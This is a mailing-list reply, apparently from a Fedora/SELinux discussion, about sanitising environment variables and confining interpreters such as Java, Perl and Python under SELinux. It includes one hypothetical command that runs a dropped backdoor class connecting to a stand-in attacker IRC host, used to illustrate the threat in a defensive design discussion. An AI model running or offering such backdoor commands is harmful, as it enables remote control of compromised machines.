Colin Walters walters-at-redhat.com |fedora| wrote:
The major threat here is environment variables, right?That one is a minor issue in my book, but certainly worth trying to enforce in some way.
I wonder what allCould be a lot. If you sanitize classpath or PERL5LIB a lot could break, but it you don't you might not be running what you think you are, which leads back to what I was inquiring about.
would break if we by changed e.g. bash and python to by default clean
the environment before executing the script if it was executed from a
domain transition
So just to clarify, whats the difference between a user running a script file that does exec "java ./MyClass.class" and a stack overrun causing a browser with a smashed stack to save a MyBackdoor.class to the local file system and execing "java ./MyBackdoor.class -irc blackhathosting.org" ?
In both cases its the same user, and in both cases its the same java VM binary. The java binary is likely the only process that knows enought to enforce anything here based on when, what, and where things are run by the user. The browser may try to limit what permissions are passed to the exec call but with a smashed stack overrun can you trust it to? Not me, at least not yet. This looks to me like the java VM needs to be hacked with the SELinux API in order to have any confidence in it, but in some ways that duplicates the java security managers role in life. Perhaps we just need a specialized Java security manager, perhaps much more. Dunno. But its a common issue with desktop actions and shells, as well as Perl, Python, Ruby, just pick your poison...
I guess what I was looking for was a phylosophy for how to handle this nebulous issue. The more likely answer is each has its own issues and must be dealt with seperatly in its own special way and must be changed to deal with SE. I am hoping for a better option as there is much in SE I don't know yet and I do want to understand it in great detail some way down the road.
Thanks.